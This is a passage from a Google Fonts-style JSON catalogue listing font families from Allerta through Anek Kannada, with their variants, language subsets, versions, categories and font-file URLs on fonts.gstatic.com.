\"http://fonts.gstatic.com/s/allerta/v18/TwMO-IAHRlkbx940UnEdSQqO5uY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Allerta Stencil\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/allertastencil/v18/HTx0L209KT-LmIE9N7OR6eiycOeF-zz313DuvQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Allison\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v9\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/allison/v9/X7nl4b88AP2nkbvZOCaQ4MTgAgk.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Allura\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2023-01-18\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/allura/v19/9oRPNYsQpS4zjuAPjAIXPtrrGA.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Almarai\",\n      \"variants\": [\n        \"300\",\n        \"regular\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"arabic\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"300\": \"http://fonts.gstatic.com/s/almarai/v12/tssoApxBaigK_hnnS_anhnicoq72sXg.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/almarai/v12/tsstApxBaigK_hnnc1qPonC3vqc.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/almarai/v12/tssoApxBaigK_hnnS-aghnicoq72sXg.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/almarai/v12/tssoApxBaigK_hnnS_qjhnicoq72sXg.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Almendra\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/almendra/v22/H4ckBXKAlMnTn0CskyY6wr-wg763.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/almendra/v22/H4ciBXKAlMnTn0CskxY4yLuShq63czE.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/almendra/v22/H4cjBXKAlMnTn0Cskx6G7Zu4qKK-aihq.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/almendra/v22/H4chBXKAlMnTn0CskxY48Ae9oqacbzhqDtg.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Almendra Display\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-04-20\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/almendradisplay/v25/0FlPVOGWl1Sb4O3tETtADHRRlZhzXS_eTyer338.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Almendra SC\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v25\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/almendrasc/v25/Iure6Yx284eebowr7hbyTZZJprVA4XQ0.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alumni Sans\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9OO5QqFsJ3C8qng.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9uO9QqFsJ3C8qng.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9Zu9QqFsJ3C8qng.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9OO9QqFsJ3C8qng.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9Cu9QqFsJ3C8qng.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd95uhQqFsJ3C8qng.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd93-hQqFsJ3C8qng.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9uOhQqFsJ3C8qng.ttf\",\n        \"900\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpHtKqkOwdO2aOIwhWudEWpx_zq_Xna-Xd9kehQqFsJ3C8qng.ttf\",\n        \"100italic\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Ky46lEN_io6npfB.ttf\",\n        \"200italic\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Kw461EN_io6npfB.ttf\",\n        \"300italic\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Kzm61EN_io6npfB.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Ky461EN_io6npfB.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8KyK61EN_io6npfB.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Kxm7FEN_io6npfB.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Kxf7FEN_io6npfB.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8Kw47FEN_io6npfB.ttf\",\n        \"900italic\": \"http://fonts.gstatic.com/s/alumnisans/v12/nwpBtKqkOwdO2aOIwhWudG-g9QMylBJAV3Bo8KwR7FEN_io6npfB.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alumni Sans Collegiate One\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alumnisanscollegiateone/v2/MQpB-XChK8G5CtmK_AuGxQrdNvPSXkn0RM-XqjWWhjdayDiPw2ta.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/alumnisanscollegiateone/v2/MQpD-XChK8G5CtmK_AuGxQrdNvPSXkn0RM-XqjWWhgdYwjytxntaDFU.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alumni Sans Inline One\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alumnisansinlineone/v2/RrQBbpJx9zZ3IXTBOASKp5gJAetBdaihcjbpD3AZcr7xbYw.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/alumnisansinlineone/v2/RrQDbpJx9zZ3IXTBOASKp5gJAetBdaihcjbpP3ITdpz0fYxcrQ.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Alumni Sans Pinstripe\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v1\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/alumnisanspinstripe/v1/ZgNNjOFFPq_AUJD1umyS30W-Xub8zD1ObhezYrVIpcDA5w.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/alumnisanspinstripe/v1/ZgNDjOFFPq_AUJD1umyS30W-Xub8zD1ObheDYL9Mh8XQ5_cY.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Amarante\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/amarante/v22/xMQXuF1KTa6EvGx9bq-3C3rAmD-b.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Amaranth\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/amaranth/v18/KtkuALODe433f0j1zPnCF9GqwnzW.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/amaranth/v18/KtkoALODe433f0j1zMnAHdWIx2zWD4I.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/amaranth/v18/KtkpALODe433f0j1zMF-OPWi6WDfFpuc.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/amaranth/v18/KtkrALODe433f0j1zMnAJWmn42T9E4ucRY8.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Amatic SC\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"hebrew\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v24\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/amaticsc/v24/TUZyzwprpvBS1izr_vO0De6ecZQf1A.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/amaticsc/v24/TUZ3zwprpvBS1izr_vOMscG6eb8D3WTy-A.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Amethysta\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-04-20\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/amethysta/v16/rP2Fp2K15kgb_F3ibfWIGDWCBl0O8Q.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Amiko\",\n      \"variants\": [\n        \"regular\",\n        \"600\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v12\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/amiko/v12/WwkQxPq1DFK04tqlc17MMZgJ.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/amiko/v12/WwkdxPq1DFK04uJ9XXrEGoQAUco5.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/amiko/v12/WwkdxPq1DFK04uIZXHrEGoQAUco5.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Amiri\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v27\",\n      \"lastModified\": \"2023-01-10\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/amiri/v27/J7aRnpd8CGxBHqUpvrIw74NL.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/amiri/v27/J7afnpd8CGxBHpUrtLYS6pNLAjk.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/amiri/v27/J7acnpd8CGxBHp2VkZY4xJ9CGyAa.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/amiri/v27/J7aanpd8CGxBHpUrjAo9zptgHjAavCA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Amiri Quran\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"arabic\",\n        \"latin\"\n      ],\n      \"version\": \"v7\",\n      \"lastModified\": \"2022-09-14\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/amiriquran/v7/_Xmo-Hk0rD6DbUL4_vH8Zq5t7Cycsu-2.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Amita\",\n      \"variants\": [\n        \"regular\",\n        \"700\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/amita/v16/HhyaU5si9Om7PQlvAfSKEZZL.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/amita/v16/HhyXU5si9Om7PTHTLtCCOopCTKkI.ttf\"\n      },\n      \"category\": \"handwriting\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anaheim\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v14\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/anaheim/v14/8vII7w042Wp87g4G0UTUEE5eK_w.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Andada Pro\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v16\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/andadapro/v16/HhyEU5Qi9-SuOEhPe4LtKoVCuWGURPcg3DPJBY8cFLzvIt2S.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/andadapro/v16/HhyEU5Qi9-SuOEhPe4LtKoVCuWGURPcg3DP7BY8cFLzvIt2S.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/andadapro/v16/HhyEU5Qi9-SuOEhPe4LtKoVCuWGURPcg3DMXAo8cFLzvIt2S.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/andadapro/v16/HhyEU5Qi9-SuOEhPe4LtKoVCuWGURPcg3DMuAo8cFLzvIt2S.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/andadapro/v16/HhyEU5Qi9-SuOEhPe4LtKoVCuWGURPcg3DNJAo8cFLzvIt2S.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/andadapro/v16/HhyGU5Qi9-SuOEhPe4LtAIxwRrn9L22O2yYBRmdfHrjNJ82Stjw.ttf\",\n        \"500italic\": \"http://fonts.gstatic.com/s/andadapro/v16/HhyGU5Qi9-SuOEhPe4LtAIxwRrn9L22O2yYBRlVfHrjNJ82Stjw.ttf\",\n        \"600italic\": \"http://fonts.gstatic.com/s/andadapro/v16/HhyGU5Qi9-SuOEhPe4LtAIxwRrn9L22O2yYBRrlYHrjNJ82Stjw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/andadapro/v16/HhyGU5Qi9-SuOEhPe4LtAIxwRrn9L22O2yYBRoBYHrjNJ82Stjw.ttf\",\n        \"800italic\": \"http://fonts.gstatic.com/s/andadapro/v16/HhyGU5Qi9-SuOEhPe4LtAIxwRrn9L22O2yYBRudYHrjNJ82Stjw.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Andika\",\n      \"variants\": [\n        \"regular\",\n        \"italic\",\n        \"700\",\n        \"700italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"latin\",\n        \"latin-ext\",\n        \"vietnamese\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/andika/v22/mem_Ya6iyW-LwqgAbbwRWrwGVA.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/andika/v22/mem9Ya6iyW-Lwqgwb7YVeLkWVNBt.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/andika/v22/mem8Ya6iyW-Lwqg40ZM1UpcaXcl0Aw.ttf\",\n        \"700italic\": \"http://fonts.gstatic.com/s/andika/v22/mem6Ya6iyW-Lwqgwb46pV50ef8xkA76a.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anek Bangla\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"bengali\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3Ofm9YIocg56yyvt0.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3Ofu9ZIocg56yyvt0.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3OfjFZIocg56yyvt0.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3Ofm9ZIocg56yyvt0.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3Ofl1ZIocg56yyvt0.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3OfrFeIocg56yyvt0.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3OfoheIocg56yyvt0.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/anekbangla/v4/_gPW1R38qTExHg-17BhM6n66QhabMYB0fBKONtHhRSIUIre5mq3Ofu9eIocg56yyvt0.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anek Devanagari\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"devanagari\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLDtk-9nFk0LjZ7E.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLBtku9nFk0LjZ7E.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLCzku9nFk0LjZ7E.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLDtku9nFk0LjZ7E.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLDfku9nFk0LjZ7E.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLAzle9nFk0LjZ7E.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLAKle9nFk0LjZ7E.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/anekdevanagari/v4/jVyo7nP0CGrUsxB-QiRgw0NlLaVt_QUAkYxLRoCL23mlh20ZVHOMAWbgHLBtle9nFk0LjZ7E.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anek Gujarati\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"gujarati\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0F5G7w0KgB7Lm7g.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0l5C7w0KgB7Lm7g.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0SZC7w0KgB7Lm7g.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0F5C7w0KgB7Lm7g.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0JZC7w0KgB7Lm7g.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0yZe7w0KgB7Lm7g.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-08Je7w0KgB7Lm7g.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/anekgujarati/v4/l7g_bj5oysqknvkCo2T_8FuiIRBA7lncQUmbIBEtPKiYYQhRwyBxCD-0l5e7w0KgB7Lm7g.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anek Gurmukhi\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"gurmukhi\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkbd5ppXK41H6DjbA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkb95tpXK41H6DjbA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkbKZtpXK41H6DjbA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkbd5tpXK41H6DjbA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkbRZtpXK41H6DjbA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkbqZxpXK41H6DjbA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkbkJxpXK41H6DjbA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/anekgurmukhi/v4/0QIAMXRO_YSkA0quVLY79JnHybfeEOrXCa9Dmd9Ql6a6R_vEMc5TaLkb95xpXK41H6DjbA.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Anek Kannada\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"kannada\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v4\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dFDEAukVReA1oef.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dHDEQukVReA1oef.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/anekkannada/v4/raxcHiCNvNMKe1CKFsINYFlgkEIwGa8nL6ruWJg1j--h8pvBKSiw4dEdEQukVReA1oef.ttf\",\n        \"regular\": 